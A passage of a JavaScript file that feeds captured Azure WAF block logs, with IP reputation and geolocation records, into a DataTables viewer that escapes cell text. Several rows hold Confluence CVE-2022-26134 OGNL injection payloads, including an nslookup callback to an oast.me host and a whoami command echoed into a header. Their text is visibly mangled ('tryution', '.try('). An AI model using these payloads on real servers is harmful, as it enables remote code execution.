"0UNNOYwAAAAC2KjZp7vBDT4nYmb0R/eOhTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3"
],
[
"2022-10-18T16:25:40.8291236Z",
"ExampleWafPolicy",
"RG_NEW",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-SQLI-942330",
"Microsoft_DefaultRuleSet-1.1",
"SQLI",
"942330",
"Detects classic SQL injection probings 1/3",
"https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=FROM&predicateValue=%22&fieldName=status&_=1666110219640",
"2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
{
"id": "138",
"created_date": "2022-10-20 11:36:46",
"last_updated": "2022-10-20 14:36:46",
"ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "0",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "6",
"continent": "Europe",
"continentCode": "EU",
"country": "Portugal",
"countryCode": "PT",
"region": "15",
"regionName": "District of Setúbal",
"city": "Amora",
"district": "",
"zip": "2845-545",
"lat": "38.6306",
"lon": "-9.111",
"timezone": "Europe/Lisbon",
"offset": "3600",
"currency": "EUR",
"isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A",
"org": "PT Comunicacoes",
"asname": "MEO-RESIDENCIAL",
"ASN": "3243",
"reverse": "",
"domain": "telepac.pt",
"usageType": "Fixed Line ISP",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]",
"QueryParamValue:predicateValue",
""",
"QueryParamValue",
"Equals",
null,
"predicateValue",
"predicateValue",
"0hNNOYwAAAAAjRbl/IboyQpGiUQYTIEjeTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3"
],
[
"2022-10-17T13:16:21.3691789Z",
"ExampleWafPolicy",
"RG_NEW",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-SQLI-942350",
"Microsoft_DefaultRuleSet-1.1",
"SQLI",
"942350",
"Detects MySQL UDF injection and other data/structure manipulation attempts",
"https://example.com:443/secure/RapidBoard.jspa?rapidView=292&amp;view=detail&amp;selectedIssue=MKT-147&amp;quickFilter=940",
"52.114.75.216",
{
"id": "10",
"created_date": "2022-08-18 11:16:37",
"last_updated": "2022-09-30 16:58:26",
"ipAddress": "52.114.75.216",
"Malicious Score": "45",
"is_crawler": "0",
"mobile": "0",
"hosting": "1",
"proxy": "1",
"vpn": "1",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "1",
"bot_status": "1",
"isPublic": "1",
"ipVersion": "4",
"continent": "Europe",
"continentCode": "EU",
"country": "Netherlands",
"countryCode": "NL",
"region": "NH",
"regionName": "North Holland",
"city": "Amsterdam",
"district": "",
"zip": "1047",
"lat": "52.3667",
"lon": "4.9",
"timezone": "Europe/Amsterdam",
"offset": "7200",
"currency": "EUR",
"isp": "Microsoft Corporation",
"org": "Microsoft Azure Cloud (westeurope)",
"asname": "MICROSOFT-CORP-MSN-AS-BLOCK",
"ASN": "8075",
"reverse": "",
"domain": "microsoft.com",
"usageType": "Data Center/Web Hosting/Transit",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamName",\r\n "matchVariableValue": "amp;selectedIssue"\r\n }\r\n]",
"QueryParamName",
"amp;selectedIssue",
"QueryParamName",
"Equals",
null,
"predicateValue",
"predicateValue",
"0pVVNYwAAAAAdw6PPacH4SpaFxq3EBVL+UEFSMjAxMDMxMDE0MDI1ADM1ZjliOTQ2LTllMWEtNDkwNS1hZWU1LWNjZjE4NGEyOTZkNw=="
],
[
"2022-10-19T15:00:05.3320972Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-MS-ThreatIntel-SQLI-99031002",
"Microsoft_DefaultRuleSet-1.1",
"MS-ThreatIntel-SQLI",
"99031002",
"SQL Comment Sequence Detected.",
"https://api.example.com:443/pages/docreatepage.action",
"94.60.196.168",
{
"id": "145",
"created_date": "2022-10-20 11:37:13",
"last_updated": "2022-10-20 14:37:13",
"ipAddress": "94.60.196.168",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "0",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Europe",
"continentCode": "EU",
"country": "Portugal",
"countryCode": "PT",
"region": "13",
"regionName": "Porto",
"city": "Porto",
"district": "",
"zip": "4000-000",
"lat": "41.1691",
"lon": "-8.6793",
"timezone": "Europe/Lisbon",
"offset": "3600",
"currency": "EUR",
"isp": "Vodafone Portugal",
"org": "Vodafone Telecel, Comunicacoes Pessoais, SA",
"asname": "VODAFONE-PT",
"ASN": "12353",
"reverse": "168.196.60.94.rev.vodafone.pt",
"domain": "vodafone.pt",
"usageType": "",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "PostParamValue:parentPageString",\r\n "matchVariableValue": "UWCL Finals - 21/22 -- 20/12/2021"\r\n }\r\n]",
"PostParamValue:parentPageString",
"UWCL Finals - 21/22 -- 20/12/2021",
"PostParamValue",
"Equals",
null,
"parentPageString",
"parentPageString",
"09RBQYwAAAACoPBvUpx4SS541IptMRYbtQlJVMzBFREdFMDQxMABlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-19T13:17:29.734758Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-PROTOCOL-ATTACK-921151",
"Microsoft_DefaultRuleSet-1.1",
"PROTOCOL-ATTACK",
"921151",
"HTTP Header Injection Attack via payload (CR/LF detected)",
"https://api.example.com:443/rest/api/search?cql=user+~+%22Has+the+Budget+been+estimated+for+the+project%5C%3F%0A%0A%0A%0AHas+the+budget+been+approved+for+project%5C%3F%0A%0A%0A%0A%0AWhat+is+the+one+time+and+recurring+costs%5C%3F%0A%0A%0A%0A%0AHave+Resources+been+estimated+%2F+secured%5C%3F%22&start=0&limit=100&_=1666184780361",
"46.140.144.11",
{
"id": "25",
"created_date": "2022-08-18 14:43:51",
"last_updated": "2022-10-21 12:35:21",
"ipAddress": "46.140.144.11",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "1",
"bot_status": "1",
"isPublic": "1",
"ipVersion": "4",
"continent": "Europe",
"continentCode": "EU",
"country": "Switzerland",
"countryCode": "CH",
"region": "ZH",
"regionName": "Zurich",
"city": "Opfikon",
"district": "",
"zip": "8152",
"lat": "47.4217",
"lon": "8.55569",
"timezone": "Europe/Zurich",
"offset": "7200",
"currency": "CHF",
"isp": "UPC Schweiz GmbH",
"org": "Sunrise UPC GmbH",
"asname": "LibertyGlobal",
"ASN": "6830",
"reverse": "46-140-144-11.static.cablecom.ch",
"domain": "hispeed.ch",
"usageType": "",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:cql",\r\n "matchVariableValue": "user ~ \\"Has the Budget been estimated for the project\\\\?\\n\\n\\n\\nHas the budget been approved for project\\\\?\\n\\n\\n\\n\\nWhat is the one time and recurring costs\\\\?\\n\\n\\n\\n\\nHave Resources been estimated / secured\\\\?\\""\r\n }\r\n]",
"QueryParamValue:cql",
"user ~ "Has the Budget been estimated for the project\\?\n\n\n\nHas the budget been approved for project\\?\n\n\n\n\nWhat is the one time and recurring costs\\?\n\n\n\n\nHave Resources been estimated / secured\\?"",
"QueryParamValue",
"Equals",
null,
"cql",
"cql",
"06fhPYwAAAADf9xmFU2iCSb9Qxiyks2JbWlJIRURHRTA2MTcAZWRmMWI0NDctOGFiZi00OTlmLWI4Y2MtMTZhOTczNzZiMGEz"
],
[
"2022-10-19T13:17:30.2529096Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-PROTOCOL-ATTACK-921151",
"Microsoft_DefaultRuleSet-1.1",
"PROTOCOL-ATTACK",
"921151",
"HTTP Header Injection Attack via payload (CR/LF detected)",
"https://api.example.com:443/rest/api/search?cql=user+~+%22Has+the+Budget+been+estimated+for+the+project%5C%3F%0A%0A%0A%0AHas+the+budget+been+approved+for+project%5C%3F%0A%0A%0A%0A%0AWhat+is+the+one+time+and+recurring+costs%5C%3F%0A%0A%0A%0A%0AHave+Resources+been+estimated+%2F+secured%5C%3Fk%22&start=0&limit=100&_=1666184780362",
"46.140.144.11",
{
"id": "25",
"created_date": "2022-08-18 14:43:51",
"last_updated": "2022-10-21 12:35:21",
"ipAddress": "46.140.144.11",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "1",
"bot_status": "1",
"isPublic": "1",
"ipVersion": "4",
"continent": "Europe",
"continentCode": "EU",
"country": "Switzerland",
"countryCode": "CH",
"region": "ZH",
"regionName": "Zurich",
"city": "Opfikon",
"district": "",
"zip": "8152",
"lat": "47.4217",
"lon": "8.55569",
"timezone": "Europe/Zurich",
"offset": "7200",
"currency": "CHF",
"isp": "UPC Schweiz GmbH",
"org": "Sunrise UPC GmbH",
"asname": "LibertyGlobal",
"ASN": "6830",
"reverse": "46-140-144-11.static.cablecom.ch",
"domain": "hispeed.ch",
"usageType": "",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:cql",\r\n "matchVariableValue": "user ~ \\"Has the Budget been estimated for the project\\\\?\\n\\n\\n\\nHas the budget been approved for project\\\\?\\n\\n\\n\\n\\nWhat is the one time and recurring costs\\\\?\\n\\n\\n\\n\\nHave Resources been estimated / secured\\\\?k\\""\r\n }\r\n]",
"QueryParamValue:cql",
"user ~ "Has the Budget been estimated for the project\\?\n\n\n\nHas the budget been approved for project\\?\n\n\n\n\nWhat is the one time and recurring costs\\?\n\n\n\n\nHave Resources been estimated / secured\\?k"",
"QueryParamValue",
"Equals",
null,
"cql",
"cql",
"06vhPYwAAAADPsK4zzms8S4Aph7io0JqkWlJIRURHRTA2MTcAZWRmMWI0NDctOGFiZi00OTlmLWI4Y2MtMTZhOTczNzZiMGEz"
],
[
"2022-10-14T13:59:21.6189951Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"0OWtJYwAAAABePH3TR7EXTYBbFT92CzFOU0VMMjFFREdFMDIwOABlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-14T13:59:21.60786Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"0OWtJYwAAAABs0zbbTE0ZTo6drCSdhZG2U0VMMjFFREdFMDIxMQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-14T14:00:04.2776607Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"0ZGtJYwAAAAAmeiJy5utDQKkghIWyxxthU0VMMjFFREdFMDIwNgBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-15T13:12:54.3205549Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-RCE-932130",
"Microsoft_DefaultRuleSet-1.1",
"RCE",
"932130",
"Remote Command tryution: Unix Shell Expression or Confluence Vulnerability (CVE-2022-26134) Found",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"104.251.238.50",
{
"id": "139",
"created_date": "2022-10-20 11:36:49",
"last_updated": "2022-10-20 14:36:49",
"ipAddress": "104.251.238.50",
"Malicious Score": "23",
"is_crawler": "0",
"mobile": "0",
"hosting": "1",
"proxy": "1",
"vpn": "1",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "North America",
"continentCode": "NA",
"country": "United States",
"countryCode": "US",
"region": "CA",
"regionName": "California",
"city": "Los Angeles",
"district": "",
"zip": "90009",
"lat": "34.0522",
"lon": "-118.244",
"timezone": "America/Los_Angeles",
"offset": "-25200",
"currency": "USD",
"isp": "Zenlayer Inc",
"org": "Klayer LLC",
"asname": "ZEN-ECN",
"ASN": "21859",
"reverse": "104.251.238.50.static.klayer.com",
"domain": "klayer.com",
"usageType": "Data Center/Web Hosting/Transit",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "DecodedPath",\r\n "matchVariableValue": "${@java.lang.Runtime@getRuntime().try(\\"nslookup cd596q505o11a119sf80dj1wxxs43mbbn.oast.me\\")}/"\r\n }\r\n]",
"DecodedPath",
"${@java.lang.Runtime@getRuntime().try("nslookup cd596q505o11a119sf80dj1wxxs43mbbn.oast.me")}/",
"DecodedPath",
"Equals",
"java.lang.Runtime",
"Very likely malicious",
null,
"01rFKYwAAAADqUAxzKjYtQojWLsyE+yp9TEFYMzExMDAwMTA4MDQ3AGVkZjFiNDQ3LThhYmYtNDk5Zi1iOGNjLTE2YTk3Mzc2YjBhMw=="
],
[
"2022-10-15T13:12:54.2857897Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-RCE-932130",
"Microsoft_DefaultRuleSet-1.1",
"RCE",
"932130",
"Remote Command tryution: Unix Shell Expression or Confluence Vulnerability (CVE-2022-26134) Found",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"104.251.238.50",
{
"id": "139",
"created_date": "2022-10-20 11:36:49",
"last_updated": "2022-10-20 14:36:49",
"ipAddress": "104.251.238.50",
"Malicious Score": "23",
"is_crawler": "0",
"mobile": "0",
"hosting": "1",
"proxy": "1",
"vpn": "1",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "North America",
"continentCode": "NA",
"country": "United States",
"countryCode": "US",
"region": "CA",
"regionName": "California",
"city": "Los Angeles",
"district": "",
"zip": "90009",
"lat": "34.0522",
"lon": "-118.244",
"timezone": "America/Los_Angeles",
"offset": "-25200",
"currency": "USD",
"isp": "Zenlayer Inc",
"org": "Klayer LLC",
"asname": "ZEN-ECN",
"ASN": "21859",
"reverse": "104.251.238.50.static.klayer.com",
"domain": "klayer.com",
"usageType": "Data Center/Web Hosting/Transit",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "DecodedPath",\r\n "matchVariableValue": "${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try(\\"whoami\\").getInputStream(),\\"utf-8\\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\\"X-Cmd-Response\\",#a))}/"\r\n }\r\n]",
"DecodedPath",
"${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/",
"DecodedPath",
"Equals",
"java.lang.Runtime",
"Very likely malicious",
null,
"01rFKYwAAAAAyThJuCwwQS6b3tJi2uoPMTEFYMzExMDAwMTA4MDIzAGVkZjFiNDQ3LThhYmYtNDk5Zi1iOGNjLTE2YTk3Mzc2YjBhMw=="
],
[
"2022-10-14T14:36:00.1574471Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"00HNJYwAAAAC4I8s8BM+WQJT5PY88psw2U0VMMjFFREdFMDExNQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-14T14:36:00.1527312Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"00HNJYwAAAABzhQVKlYE7Q4SM9bt5uFhHU0VMMjFFREdFMDExMQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
]
];
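/**
 * Builds the DataTable of blocked Azure WAF requests once the DOM is ready.
 *
 * Rows come from the page-level `data` array. Each row is a positional array, so the
 * `columns` list must stay in the same order as the values inside a row.
 *
 * Several cells (request URI, matched variable value, raw match details) carry text taken
 * from the blocked requests themselves. DataTables writes cell data into the page as HTML
 * by default, so every column is given the built-in text renderer, which HTML-escapes
 * string values before they are displayed.
 */
$(document).ready(function () {
  var oTable = $('#azure-waf-block-table').DataTable({
    data: data,
    paging: false,
    // pagingType: 'full_numbers',
    scrollY: 600,
    // Treat every cell as plain text: request-derived strings must never be parsed as markup.
    columnDefs: [
      { targets: '_all', render: $.fn.dataTable.render.text() },
    ],
    // Titles follow the order of values in each row of `data`:
    // message, request URI, client IP, reputation object, raw match JSON,
    // match variable name, match variable value, filtered variable name, ...
    columns: [
      { title: 'TimeGenerated' },
      { title: 'policy_s' },
      { title: 'ResourceGroup' },
      { title: 'SubscriptionId' },
      { title: 'Rule' },
      { title: 'RuleSet' },
      { title: 'RuleGroup' },
      { title: 'RuleId' },
      { title: 'details_msg_s' },
      {
        title: 'requestUri_s',
        // NOTE(review): these flags sat on this position (row index 9) under the
        // 'details_msg_s' title; kept by position - confirm which column they are meant for.
        searchable: false,
        orderable: false,
      },
      { title: 'ClientIP' },
      { title: 'Client_IP_Reputation' },
      { title: 'details_matches_s' },
      { title: 'matchVariableName' },
      { title: 'matchVariableValue' },
      { title: 'matchVariableNameFiltered' },
      { title: 'selectorMatchOperator' },
      { title: 'Matched_Malicious_profile' },
      { title: 'Whitelist_suggestion' },
      { title: 'Whitelist' },
      { title: 'trackingReference_s' },
    ],
    // Per-column select filter, currently disabled.
    // If re-enabled: create each <option> with jQuery setters (.val(d), .text(d)) instead of
    // concatenating `d` into an HTML string, because `d` includes request-derived text.
    // initComplete: function () {
    //   this.api()
    //     .columns()
    //     .every(function () {
    //       var column = this;
    //       var select = $('<select class="bg-white dark:bg-slate-800 text-black dark:text-white border border-black dark:border-white"><option value=""></option></select>')
    //         .appendTo($(column.header()))
    //         .on('change', function () {
    //           var val = $.fn.dataTable.util.escapeRegex($(this).val());
    //           column.search(val ? '^' + val + '$' : '', true, false).draw();
    //         });
    //       column
    //         .data()
    //         .unique()
    //         .sort()
    //         // j is the index of the data, d is the actual data
    //         .each(function (d, j) {
    //           select.append('<option value="' + d + '">' + d + '</option>');
    //           //console.log('j is: ' + d);
    //         });
    //     });
    // }
  });
});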